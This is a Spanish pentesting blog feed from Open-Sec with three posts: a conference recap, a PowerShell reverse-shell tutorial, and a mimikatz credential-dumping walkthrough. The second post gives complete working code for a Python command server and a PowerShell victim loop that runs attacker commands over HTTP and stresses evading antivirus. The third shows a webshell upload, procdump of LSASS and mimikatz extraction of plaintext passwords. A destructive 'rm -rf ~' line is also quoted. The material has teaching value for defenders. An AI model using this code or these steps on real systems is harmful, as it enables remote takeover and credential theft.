tag:blogger.com,1999:blog-11424204730591738022024-02-19T02:24:54.286-05:00Open-Sec -Seguridad y Contraseguridad InformáticaOpen-Sechttp://www.blogger.com/profile/12321871096900747631noreply@blogger.comBlogger50125tag:blogger.com,1999:blog-1142420473059173802.post-86701752248999288742015-11-16T00:57:00.000-05:002016-02-08T17:28:33.587-05:00Workshops @ Ekoparty 2015Del 21 al 23 octubre se llevó a cabo la conferencia de seguridad Ekoparty (#eko11), en esta ocasión tuvimos el agrado de ser representados por Walter Cuestas, Mauricio Urizar y Juan Oliva, quienes, tuvieron el gusto de realizar los workshops "PowerShell para pentesters", "Nmap Web Hacking 101" y "Pentesting de Canales Transaccionales de Banca y Retail"<br />
<br />
Ekoparty es, sin duda, no solo una conferencia que reúne a reconocidos profesionales de diversas partes del mundo, sino, literalmente, una fiesta donde los asistentes pueden compartir conocimiento, experiencias, amistades, vivencias, juegos y hasta unas cervezas.<br />
<br />
Por este medio queremos felicitar a los organizadores y a nuestros consultores por esta fiesta de la seguridad y queremos compartir con ustedes unas imágenes de lo que fue la Ekoparty (#eko11).<br />
<br />
A continuación podrán ver la galería con algunas fotos del evento:<br />
<br />
<table style="width: 536px;"><tbody>
<tr><td align="center" style="background: url(https://www.gstatic.com/pwa/s/v/lighthousefe_20151110.00_p0/transparent_album_background.gif) no-repeat left;"><a href="https://picasaweb.google.com/103338141437161978460/Ekoparty02?feat=directlink#slideshow/6213808713001639634"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjT5oR-Bd6PrBF9BzVHvlKpcBdDNFh1V3yxfZdIB_oncOupgd_WwWsfF9-Q68pKMJMkTSFshq8rICPDu_J1W8CfCzjnUppn2izPhIq59Djw1VnOwYBzbQPILTf12MrShQnW9L2Iwpex5p0/s599-Ic42/CSB_OUuWsAE72YU.jpg" style="margin: 1px 0 0 4px; width: 500px;" /></a></td></tr>
<tr><td style="font-family: arial,sans-serif; font-size: 11px; text-align: center;"><a href="https://picasaweb.google.com/103338141437161978460/Ekoparty02?authuser=0&feat=embedwebsite" style="color: #4d4d4d; font-weight: bold; text-decoration: none;">Ekoparty</a></td></tr>
</tbody></table>
<br />
<br />
También compartimos las diapositivas de los workshops:<script async="" class="speakerdeck-embed" data-id="0af4abc6500442649527c4d41c0140e5" data-ratio="1.33333333333333" src="//speakerdeck.com/assets/embed.js"></script><br />
<script async="" class="speakerdeck-embed" data-id="02c0df1fb6584af49d00149505f40ad2" data-ratio="1.77777777777778" src="//speakerdeck.com/assets/embed.js"></script><br />
Los scripts presentados en la conferencia pueden descargarlos desde: https://github.com/Open-Sec/ekoparty2015<br />
<br />
Saludos.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1142420473059173802.post-59491972281622464812015-10-16T10:51:00.001-05:002015-10-16T10:58:06.020-05:00Shell Reversa sobre HTTP con PowerShell<div style="text-align: justify;">
En unos días mas se inicia la edición 11 de Ekoparty, una conferencia muy reconocida, a la que tuvimos el gusto de asistir hace algún tiempo, en la República Argentina, país hermano que nos ha dado tantos buenos recuerdos.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Como dicen, para muestra un botón, así que les presentamos algo básico de lo que podrán ver en el workshop de “PowerShell para Pentesters” que desarrollarán Walter Cuestas y Mauricio Urizar, dos miembros de Open-Sec, con amplia experiencia en diversas áreas de la seguridad informática.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
El día de hoy les presentamos una Shell Reversa que se comunica con su “maestro” a través de HTTP y esta implementada en PowerShell. Durante los ataques del lado del cliente, se puede emplear una combinación de técnicas o emplear ingeniería social con la finalidad de lograr que el usuario ejecute el script malicioso.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
El uso de ingeniería social para lograr que la “víctima” ejecute nuestro script es nada descabellado, varios desarrolladores hacen uso de código que encuentran en la web y muchas veces ni lo revisan, incluso los pentesters reconocidos no se encuentran libres de este tipo de descuidos, recuerdo una vez que un buen amigo (que mantendremos en el anonimato por obvias razones) buscó un exploit para una vulnerabilidad y para su sorpresa encontró uno hecho que prometía hacer el trabajo gratis, luego de ejecutarlo y no ver la shell prometida, se dió con la amarga sorpresa de que el “exploit” había borrado los archivos de su “directorio home”, entre otras lineas de código había una con el siguiente comando: “rm -rf ~”.</div>
<div style="text-align: justify;">
<br /></div>
<h3>
<b>¿Qué es PowerShell?</b></h3>
<div style="text-align: justify;">
<b>Según Microsoft (https://technet.microsoft.com/es-es/library/bb978526.aspx):</b> Windows PowerShell® es un lenguaje de scripting y shell de línea de comandos basado en tareas diseñado especialmente para la administración del sistema. Creado con Microsoft .NET Framework, Windows PowerShell ayuda a los profesionales de TI y a los usuarios experimentados a controlar y automatizar la administración tanto del sistema operativo Windows como de las aplicaciones que se ejecutan en Windows.</div>
<div style="text-align: justify;">
Los comandos de Windows PowerShell, denominados cmdlets, permiten administrar los equipos de la empresa desde la línea de comandos. Los proveedores de Windows PowerShell permiten obtener acceso a almacenes de datos (como el Registro y el almacén de certificados) con la misma simplicidad con que se obtiene acceso al sistema de archivos. Además, Windows PowerShell tiene un analizador de expresiones muy completo y un lenguaje de scripting totalmente desarrollado.</div>
<br />
<h3>
<b>Según la perspectiva de un pentester:</b></h3>
<div style="text-align: justify;">
PowerShell es una poderosa herramienta de scripting que permite ejecutar casi cualquier tarea de pentesting desde MS Windows, claro no es lo mismo tener un nmap instalado en nuestra víctima, pero si no lo esta con PowerShell podemos fácilmente ejecutar un escaneo de puertos o cualquier otra cosa que nos imaginemos.</div>
<br />
<h3>
<b>¿Por qué usar PowerShell?</b></h3>
<div style="text-align: justify;">
Muchas veces hemos logrado acceso a servidores donde solo han instalado el software indispensable, y queremos intentar comprometer otro servidor, ante la falta de herramientas instaladas, podemos hacer uso de diversas técnicas, entre ellas el uso de PowerShell.</div>
<div style="text-align: justify;">
Con PowerShell es relativamente sencillo evadir cualquier antivirus, además es tan potente como lo sea tu imaginación, así que no hay limites para los scripts que desees desarrollar.</div>
<div style="text-align: justify;">
Entre mas familiarizado estés con Microsoft .Net Framework mas sencillo te será desarrollar scripts para atacar.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGQQzoSwh0DWCoIqK8wGZETWR6csDD_5ePn2GPbzGXPBc6GMjkHpoev1t__WHbpJeK3eEMKasNz7MJqA1cUdwGgTyVSRdjfhGZKLK6bAsyU20drKWiXDnYuNRWBOIoer_M0bDe8bAdoCz1/s1600/diagrama.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGQQzoSwh0DWCoIqK8wGZETWR6csDD_5ePn2GPbzGXPBc6GMjkHpoev1t__WHbpJeK3eEMKasNz7MJqA1cUdwGgTyVSRdjfhGZKLK6bAsyU20drKWiXDnYuNRWBOIoer_M0bDe8bAdoCz1/s400/diagrama.png" width="382" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div style="text-align: justify;">
Como vemos en la imagen, la “víctima” se comunica con el “atacante” pasando a través de los servidores firewall, proxy, anti-malware, para esto emplea el protocolo HTTP, donde el “atacante” envía un comando que será ejecutado en la víctima y finalmente la víctima retorna el resultado del comando. La ventaja de usar PowerShell es que existen muchísimas formas de hacer ataques, y muchísimas formas de evadir las firmas de los anti-malware, además es posible enviar los comandos cifrados, emplear HTTPS, emplear el proxy de la empresa, etc, con la finalidad de evitar los filtros anti-malware.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
El paso de variables entre víctima y atacante lo realizaremos a través de cabeceras HTTP, codificadas en base64. El componente “maestro” perteneciente al atacante esta desarrollado en Python, envía el comando a través de la cabecera CMD y recibe la respuesta a través de la cabecera RPTA.</div>
<br />
El código del “maestro” es el siguiente:<br />
<pre class="western" style="background-color: white; font-family: Courier New, Courier, monospace;"><span style="color: #1f1c1b; font-family: Courier New, Courier, monospace;"><span style="color: #924c9d;">from </span>BaseHTTPServer <span style="color: #924c9d;">import </span>BaseHTTPRequestHandler,HTTPServer</span>
<span style="color: #1f1c1b; font-family: Courier New, Courier, monospace;"><span style="color: #924c9d;">import </span>base64</span>
<span style="color: #1f1c1b; font-family: Courier New, Courier, monospace;">PORT<b>=</b> <span style="color: #b08000;">80</span></span>
<span style="color: #1f1c1b; font-family: Courier New, Courier, monospace;"><b>class</b> clsMaster(BaseHTTPRequestHandler):</span>
<span style="color: #1f1c1b; font-family: Courier New, Courier, monospace;">
<b>def</b> do_GET(<span style="color: #006e28;">self</span>):</span>
<span style="color: #1f1c1b; font-family: Courier New, Courier, monospace;"> <span style="color: #006e28;">self</span>.send_response(<span style="color: #b08000;">200</span>)</span>
<span style="color: #1f1c1b; font-family: Courier New, Courier, monospace;"> <b>if</b> (<span style="color: #006e28;">self</span>.headers.get(<span style="color: #bf0303;">'RPTA'</span>)):</span>
<span style="color: #1f1c1b; font-family: Courier New, Courier, monospace;"> rpta<b>=</b><span style="color: #006e28;">self</span>.headers.get(<span style="color: #bf0303;">'RPTA'</span>)</span>
<span style="color: #1f1c1b; font-family: Courier New, Courier, monospace;"> <span style="color: #0057ae;">print</span> base64.b64decode(rpta)</span>
<span style="color: #1f1c1b; font-family: Courier New, Courier, monospace;">
<b>else</b>:</span>
<span style="color: #1f1c1b; font-family: Courier New, Courier, monospace;">
cmd <b>=</b> base64.b64encode(<span style="color: #0057ae;">raw_input</span>(<span style="color: #bf0303;">"command:>> "</span>))</span>
<span style="color: #1f1c1b; font-family: Courier New, Courier, monospace;"> <span style="color: #006e28;">self</span>.send_header(<span style="color: #bf0303;">'CMD'</span>,cmd)</span>
<span style="color: #1f1c1b; font-family: Courier New, Courier, monospace;"> <span style="color: #006e28;">self</span>.end_headers()</span>
<span style="color: #1f1c1b; font-family: Courier New, Courier, monospace;"> <span style="color: #006e28;">self</span>.wfile.write(<span style="color: #bf0303;">"<html><body><h1>It
works!</h1><p>This is the default web page for this
server.</p><p>The web server software is running but no
content has been added, yet.</p></body></html>"</span>)</span>
<span style="color: #1f1c1b; font-family: Courier New, Courier, monospace;"> <b>return</b></span>
<span style="color: #1f1c1b; font-family: Courier New, Courier, monospace;"><b>try</b>:</span>
<span style="color: #1f1c1b; font-family: Courier New, Courier, monospace;"> server <b>=</b> HTTPServer((<span style="color: #bf0303;">''</span>,PORT), clsMaster)</span>
<span style="color: #1f1c1b; font-family: Courier New, Courier, monospace;"> server.serve_forever()</span>
<span style="font-family: Courier New, Courier, monospace;"><b style="color: #1f1c1b;">except </b><span style="color: #054d00;"><b>KeyboardInterrupt</b></span><span style="color: #1f1c1b;">:</span></span>
<span style="background-color: white; color: #1f1c1b;"><span style="font-family: Courier New, Courier, monospace;"> server.socket.close()</span></span></pre>
<br />
<br />
<br />
<div style="text-align: justify;">
El script que deberá ser ejecutado en la “víctima” se conecta al “atacante”, recibe los comandos a ser ejecutados y envía las respuestas, todo esto a través de cabeceras HTTP codificadas en base64:</div>
<pre class="western" style="background-color: white; font-family: Courier New, Courier, monospace;"><span style="color: #1f1c1b;">while <span style="color: #bf0303;">(1)</span>
{</span>
<span style="color: #93c47d;"><i><#</i><i>direccion URL del atacante#></i></span>
<span style="color: #1f1c1b;">$server = "http:<span style="color: #0057ae;">//192.168.0.3</span><span style="color: #0057ae;">2</span><span style="color: #0057ae;">/";</span></span>
<span style="color: #1f1c1b;">$req = [System.Net.HttpWebRequest]::Create<span style="color: #bf0303;">($server)</span>;</span>
<span style="color: #93c47d;"><i><#</i>
<i>#############################################################</i>
<i># Proxy Configuration #</i>
<i>#############################################################</i>
<i>#$proxy=[System.Net.WebRequest]::GetSystemWebProxy();</i>
<i>#$proxy.Credentials=[System.Net.CredentialCache]::DefaultCredentials;</i>
<i>#$req.proxy = $proxy</i>
<i>#############################################################</i>
<i>#></i></span>
<span style="color: #1f1c1b;">$res = $req.GetResponse<span style="color: #bf0303;">()</span>;</span>
<span style="color: #1f1c1b;">$cmdcoded = $res.GetResponseHeader<span style="color: #bf0303;">("CMD")</span>;</span>
<i style="color: #1f1c1b; font-size: small;"><span style="background-color: white;">
</span></i>
<i style="font-size: small;"><span style="color: #93c47d;"><#decodifica el comando cmd enviado en base64#></span></i>
<span style="color: #1f1c1b;">$cmd = [System.Text.Encoding]::UTF8.GetString<span style="color: #bf0303;">([System.Convert]::FromBase64String($cmdcoded)</span>);</span>
<i style="color: #1f1c1b; font-size: small;"><span style="background-color: white;">
</span></i>
<i style="font-size: small;"><span style="color: #93c47d;"><#crea y ejecuta un proceso cmd.exe con los comandos enviados por el atacante#></span></i>
<span style="color: #1f1c1b;">$psi= New-Object System.Diagnostics.ProcessStartInfo;</span>
<span style="color: #1f1c1b;">$psi.FileName = "cmd.exe";</span>
<span style="color: #1f1c1b;">$psi.RedirectStandardOutput = $true;</span>
<span style="color: #1f1c1b;">$psi.RedirectStandardInput = $true;</span>
<span style="color: #1f1c1b;">$psi.RedirectStandardError = $true;</span>
<span style="color: #1f1c1b;">$psi.UseShellExecute = $false;</span>
<span style="color: #1f1c1b;">$process = New-Object System.Diagnostics.Process;</span>
<span style="color: #1f1c1b;">$process.StartInfo = $psi;</span>
<span style="color: #1f1c1b;">$process.Start<span style="color: #bf0303;">()</span>;</span>
<span style="color: #1f1c1b;">$process.StandardInput.WriteLine<span style="color: #bf0303;">($cmd)</span>;</span>
<span style="color: #1f1c1b;">$process.StandardInput.WriteLine<span style="color: #bf0303;">("exit")</span>;</span>
<span style="color: #1f1c1b;">$standardOut = $process.StandardOutput.ReadToEnd<span style="color: #bf0303;">()</span>;</span>
<span style="color: #1f1c1b;">$process.WaitForExit<span style="color: #bf0303;">()</span>;</span>
<span style="background-color: white;">
</span>
<span style="color: #93c47d;"><i><#codifica la respuesta en base64#></i></span>
<span style="color: #1f1c1b;">$rpta=[System.Convert]::ToBase64String<span style="color: #bf0303;">([System.Text.Encoding]::UTF8.GetBytes($standardOut)</span>);</span>
<span style="color: #1f1c1b;">$res.Close<span style="color: #bf0303;">()</span>;</span>
<span style="color: #1f1c1b;"><span style="color: #93c47d;"><i><#inicia otra petición para enviar la respuesta al atacante#></i></span></span>
<span style="color: #1f1c1b;">$req2 = [System.Net.HttpWebRequest]::Create<span style="color: #bf0303;">($server)</span>;</span>
<span style="color: #1f1c1b;">$req2.Headers.<b>add</b><span style="color: #bf0303;">('RPTA',$rpta)</span>;</span>
<span style="color: #1f1c1b;">$res2 = $req2.GetResponse<span style="color: #bf0303;">()</span>;</span>
<span style="color: #1f1c1b;">$res2.Close<span style="color: #bf0303;">()</span>;</span>
</pre>
<br />
Cuando ejecutamos ambas partes podemos ver en la ventana de comandos del atacante lo siguiente:<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCrE41RLSA0PxiPQmZQ8TV13TxqKrJBY5gt1SrcmbfzLPLkzr2ELX8z5l4M0qya7x_jfU51OACIAM_EA5P4hvHdj6t-a9w8U7fMLLNFJ0IUIO0ZcWUg7wZEJMkgr4QjATyXGrUMuU-pOnB/s1600/atacante.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="450" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCrE41RLSA0PxiPQmZQ8TV13TxqKrJBY5gt1SrcmbfzLPLkzr2ELX8z5l4M0qya7x_jfU51OACIAM_EA5P4hvHdj6t-a9w8U7fMLLNFJ0IUIO0ZcWUg7wZEJMkgr4QjATyXGrUMuU-pOnB/s640/atacante.png" width="640" /></a><br />
<br />
Y en la ventana de la víctima lo siguiente:<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDt4sSW-QFMuOaMuiB-liblGMKNXgc7wCPUWCV2BXGkUWXoYSthAGbAq4pLoTk1mex3SAIEcRE6F19dhNKWpQvsnBcAkWyT_Jwu1Y9rEksX4x0Md9ELlq7lE1O3pNN5qRatD3gqXxbH7r0/s1600/victima.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDt4sSW-QFMuOaMuiB-liblGMKNXgc7wCPUWCV2BXGkUWXoYSthAGbAq4pLoTk1mex3SAIEcRE6F19dhNKWpQvsnBcAkWyT_Jwu1Y9rEksX4x0Md9ELlq7lE1O3pNN5qRatD3gqXxbH7r0/s640/victima.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="text-align: justify;">Si desean conocer mas al detalle como emplear PowerShell para labores de pentest, vayan a Ekoparty y asistan al Workshop “PowerShell para Pentesters”, y si no pueden viajar pueden hacer sus peticiones para que lo repitan en PeruHack 2015.</span><br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
Información del Workshop “PowerShell para Pentesters”</h3>
<div style="text-align: justify;">
Descripción : El uso de PowerShell para la labor de un pentester va mas alla de la post-explotación hoy en día. Este workshop muestra como realizar labores de pentesting básicas desde cero (escaneo de puertos y servicios, carga y descarga de archivos, bypass de restricciones de ejecución) hasta su aplicación en ataques del lado cliente, post-explotación y el uso de scripts avanzados que forman parte del arsenal de un pentester.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
BIOS :</h3>
<div style="text-align: justify;">
<b>Walter Cuestas Agramonte</b></div>
<div style="text-align: justify;">
Actual Gerente General de Open-Sec, empresa peruana dedicada a desarrollar servicios de ethical hacking y análisis de incidentes de seguridad informática. Dirige el equipo de hackers profesionales de Open-Sec desde el 2006.</div>
<div style="text-align: justify;">
Su labor se basa en desarrollar técnicas de intrusión y su interés principal está en el desarrollo de scripts para pentesting. Es instructor del curso de Ethical Hacking (PCC Seguridad Informática) en TECSUP e Instructor Autorizado por Mile2 en el nivel Senior.</div>
<div style="text-align: justify;">
Cuenta con las certificaciones OSCP, C)PTC, C)PTE y C|EH.</div>
<div style="text-align: justify;">
Ha participado como expositor en eventos como LimaHack, Campus Party Quito, CSI Pereira y eventos de OWASP Latam.</div>
<div style="text-align: justify;">
También, ha publicado artículos en revistas especializadas como Hakin9, PenTest Magazine y Hack-in-Sight.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Mauricio Urizar Franco</b></div>
<div style="text-align: justify;">
Mauricio Urizar es investigador en Seguridad y Consultor en Open-Sec. Sus principales intereses en el campo son las técnicas de explotación de vulnerabilidades, la ingeniería social, la investigación en vulnerabilidades en aplicaciones de pago así como cajeros Automaticos(ATM), cajeros (ventanilla)/cores bancarios,puntos de venta (PoS), switches transaccionales. Focalizado en Seguridad de tipo ofensiva, Mauricio ha descubierto públicamente vulnerabilidades críticas en este tipo de infraestructuras. Trabaja hace 8 años exclusivamente como proveedor de servicios de seguridad ofensiva (pentester) para empresas de distintos rubros como energía, financieras, medios, ventas, gobierno, servicios y organizaciones de desarrollo de software.</div>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-1142420473059173802.post-33735046394779507512014-01-20T15:15:00.001-05:002014-01-20T21:38:10.813-05:00EXTRAYENDO CONTRASEÑAS DE LA RAM CON MIMIKATZ 2.0 (ALFA) <p align="justify">
Luego de “<b>Sacando credenciales hasta del bolsillo</b>” en <b><a target="_blank" href="https://twitter.com/PeruHackCon">@peruhackcon2013</a></b> he recibido algunas consultas sobre como utilizar <b>mimikatz 2.0 (ALFA)</b>, esta herramienta puede ser particularmente útil durante la etapa de explotación de vulnerabilidades en un servicio de <i>pentest</i>, por ejemplo la explotación de una aplicación web vulnerable a carga de archivos (File Upload) sin restricciones en muchos ataques es el primer paso para tomar control del sistema objetivo.
<br><br>
A continuación, el ataque sólo tiene que encontrar la manera de ejecutar código luego de subir la respectiva webshell "phpshel.php" vemos que nos encontramos con permisos de "NT AUTHORITY\SYSTEM" y queremos extraer la clave del "Administrator", lo primero que pensamos es "la hago con meterpreter" y cuando logramos subirlo el antivirus del servidor web afectado reconoce dicha herramienta como código "malicioso"...
<br><br>
Para este caso podríamos utilizar la técnica que nos presenta <b>mimikatz 2.0 (ALFA)</b> puesto que en esta nueva versión ya no es necesario “inyectar” la librería "sekurlsa.dll" en el proceso de LSASS <b>mimikatz# inject::process lsass.exe sekurlsa.dll</b>, en esta nueva versión la técnica se basa en la obtención de contraseñas en texto plano volcando el proceso LSASS.EXE desde la memoria RAM, sin necesidad de ejecutar código "malicioso" en el servidor, de esta forma se evita tener que lidiar con técnicas de evasión antivirus y otros dolores de cabeza.
<br />
<br/>
En este post me gustaría mostrar paso a paso como podemos usar la funcionalidad de mimikatz 2.0 (ALFA) explotando una aplicación web vulnerable a carga de archivos sobre un servidor Windows 2008.
<br />
<br>
<b>1.SUBIENDO LAS HERRAMIENTAS</b>
<br>
Subir las herramientas usando una aplicación vulnerable a carga de archivos (File Upload).
<br>
En caso de tener problemas para hallar la ruta en donde se han almacenado los archivos cargados en el servidor, podríamos usar <b><a target=_blank href=https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project>Dirbuster</a></b> para tratar de descubrir el directorio en donde se encuentren nuestros archivos en este caso se hallaron en "/webapp/admin/panel/images/"
<br>
<br>
<b>phpshell.php</b>; para realizar la ejecución de comandos en el servidor web afectado.<br>
<b>procdump.exe</b>; nos permitirá realizar el volcar el espacio de memoria RAM del proceso LSASS.EXE a un archivo.dmp (dump)
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMaewUEb0rLfiBmKiMXoy71YEPRqb4zRdPDYvWCqYSamLYid0iQmg9rhaiNjvMsKn8dbtTFKDLlpTOrUlqg3qmYY9pU8noio7fN9MThjn2bP5yHaMgRaE6WKK1W4TZ7WuWue0BWk9ynxj-/s1600/up01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMaewUEb0rLfiBmKiMXoy71YEPRqb4zRdPDYvWCqYSamLYid0iQmg9rhaiNjvMsKn8dbtTFKDLlpTOrUlqg3qmYY9pU8noio7fN9MThjn2bP5yHaMgRaE6WKK1W4TZ7WuWue0BWk9ynxj-/s400/up01.png" /></a></div>
<center>
Subiendo "WebShell" al servidor</center>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhylPsTlsdUOzBmNtepe3i9smKadNOlqCe74sJWldvndag945kp1dQrs3rEqqAddV8gibiUnr6UPImmup8mbfILPgv3Ff92GxE-yRo9ZrkAs41XxXclXHkhYF4Jrjqojhgj-r3MjqbFAWHt/s1600/up02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhylPsTlsdUOzBmNtepe3i9smKadNOlqCe74sJWldvndag945kp1dQrs3rEqqAddV8gibiUnr6UPImmup8mbfILPgv3Ff92GxE-yRo9ZrkAs41XxXclXHkhYF4Jrjqojhgj-r3MjqbFAWHt/s400/up02.png" /></a></div>
<center>
Subiendo "procdump" al servidor</center>
<br />
<br>
<b>2.VOLCANDO LA RAM DEL SERVIDOR WEB</b>
<br><br>
Ejecución del comando "dir" en el servidor para confirmar se logro subir la herramienta <b>procdump.exe</b> y el script desde donde se ejecutara (<b>script.dumper.bat</b>) </center><br>
<br>
Usaremos <b>Procdump</b> para volcar el espacio de la memoria RAM asignado al proceso LSASS.EXE y generar archivo “dump” que se usará fuera de linea para conseguir la contraseña del "Administrador local" y/o del "Domain Admin".
<br>
<br>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg16css_vCgLJDMbl8NS58ps3DuOpkYX3_w9-Ni4jMqLl3Gkyr4V1y28GvcUt9slvasX7kPdicwkAWJXPrFwZ8foy7xWnUAQrS1pj_4-ttd_CWkaRu_srvAFo_cjHBZO23aH2EzlXvQacQo/s1600/cmd_dir.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg16css_vCgLJDMbl8NS58ps3DuOpkYX3_w9-Ni4jMqLl3Gkyr4V1y28GvcUt9slvasX7kPdicwkAWJXPrFwZ8foy7xWnUAQrS1pj_4-ttd_CWkaRu_srvAFo_cjHBZO23aH2EzlXvQacQo/s400/cmd_dir.png" /></a></div>
<center>
Ejecución comando "dir" mediante <b>phpshell.php?cmd=dir</b>
<br>
<br>
<p align="justify">
<b>Como utilizo <i>procdump.exe</i>? </b>
<br>
<br>
Se ejecutara desde el archivo <b>script.dumper.bat</b> donde llamaremos a <b>procdump.exe</b> y le pasaremos los siguientes parámetros:
<br>
<br>
<b>-accepteula</b> : opción de línea de comando para aceptar automáticamente el contrato de licencia de Sysinternals.
<br>
<b>-ma</b> : escribir un archivo de volcado con toda la memoria del proceso. El formato de volcado predeterminado sólo incluye hilos (threads) del proceso e información de gestión.
<br>
<br>
Por último la ubicación donde se guardara el archivo con el volcado del proceso <b>lsass.exe</b> (C:\xampp\htdocs\webapp\admin\panel\images\) una ubicación donde se pueda descargar vía el servidor web.
<br>
<br>
Procdump : <a href=http://technet.microsoft.com/sysinternals/dd996900.aspx>http://technet.microsoft.com/sysinternals/dd996900.aspx</a>
<br>
<div style="background-color: #4d4d4d; border: 1px solid #aaa; font-size: 10pt; margin: 0px; padding: 10px 25px 10px 25px;">
<b>type script.dumper.bat </b>
<br />
<pre>C:\xampp\htdocs\webapp\admin\panel\images\procdump.exe <br>
-accepteula <br>
-ma lsass.exe <br>
C:\xampp\htdocs\webapp\admin\panel\images\%COMPUTERNAME%_lsass.dmp
</pre>
</div>
<center>Contenido del script "script.dumper.bat"</center>
<br/>
<p align="justify">
<b>Como ejecutar <i>script.dumper.bat</i> en el servidor web? </b>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkECKe4GgxybDz_mYQbsJpYeRg8shSif2-KwYpnesF6vEMoDypfKtJ15p7k15Cm5xW-UePnorF0jHGaL-YJRh4uNVK52Srz1i5_uDZyLFcscNVc1EAUL8EOD298g6afysnCNDJokTA5c0l/s1600/exe_dumper.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkECKe4GgxybDz_mYQbsJpYeRg8shSif2-KwYpnesF6vEMoDypfKtJ15p7k15Cm5xW-UePnorF0jHGaL-YJRh4uNVK52Srz1i5_uDZyLFcscNVc1EAUL8EOD298g6afysnCNDJokTA5c0l/s400/exe_dumper.png" /></a></div>
<center>Ejecución script.bat mediante <b>phpshell.php?cmd=script.dumper.bat</b></center>
<br>
<p align="justify">
Descargar el archivo “dump” para explotarlo con <b>#mimikat</b>
<br>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4-xv3aUU1MO-t6ycFD4577C4EaUWu57ubtUzmW1aYIB36t8YyiwRlleogrKF-KKCco5XQxgg0hv02I8xTPZvFz4MZr7ExMKBSeCgk9e9dkSTb0QAQ-UkYQ0pmccaDhy0cyebZQC0xh3rc/s1600/down_dump.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4-xv3aUU1MO-t6ycFD4577C4EaUWu57ubtUzmW1aYIB36t8YyiwRlleogrKF-KKCco5XQxgg0hv02I8xTPZvFz4MZr7ExMKBSeCgk9e9dkSTb0QAQ-UkYQ0pmccaDhy0cyebZQC0xh3rc/s400/down_dump.png" /></a></div>
<center>
Descarga del volcado de la RAM desde el directorio web</center>
<br />
<br>
<p align="justify">
<b>3.USANDO MIMIKATZ 2.0 - Modulo MINIDUMP!!</b>
<br>
<br>
Descargar <b>mimikatz</b> desde el repositorio oficial <b><a target=_blank href=http://blog.gentilkiwi.com/mimikatz>gentilkiwi</a></b>, descomprimir e ingresar desde la consola de comandos ejecutando <b>mimikatz.exe</b>.
<br>
<div style="background-color: #4d4d4d; border: 1px solid #aaa; font-size: 10pt; margin: 0px; padding: 10px 25px 10px 25px;text-align: left">
<b>mimikatz # privilege::debug</b>
<br>
<b>mimikatz # sekurlsa::minidump</b> nombre-del-archivo-dump-descargado.dmp
<br>
<b>mimikatz # sekurlsa::logonpasswords</b>
<br>
</div>
<br>
<br>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGmW4vY7UHncj7Az1WoTxszEqU6Vrmn_8TLvjDvuIGxBPnKwB-mXqO3dD-cV7m4CfpYEMx1xScpW3wy9k3VZuLkQP8zGHGqx7ivUcOP4hNQzPNqMMR0r1KzmU6aY53z7DaJmbxo0wklAGW/s1600/mimikatz2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGmW4vY7UHncj7Az1WoTxszEqU6Vrmn_8TLvjDvuIGxBPnKwB-mXqO3dD-cV7m4CfpYEMx1xScpW3wy9k3VZuLkQP8zGHGqx7ivUcOP4hNQzPNqMMR0r1KzmU6aY53z7DaJmbxo0wklAGW/s400/mimikatz2.png" /></a></div>
Listado de Archivos.
<br>
<br>
<div class="separator" style="clear: both; text-align: center;">
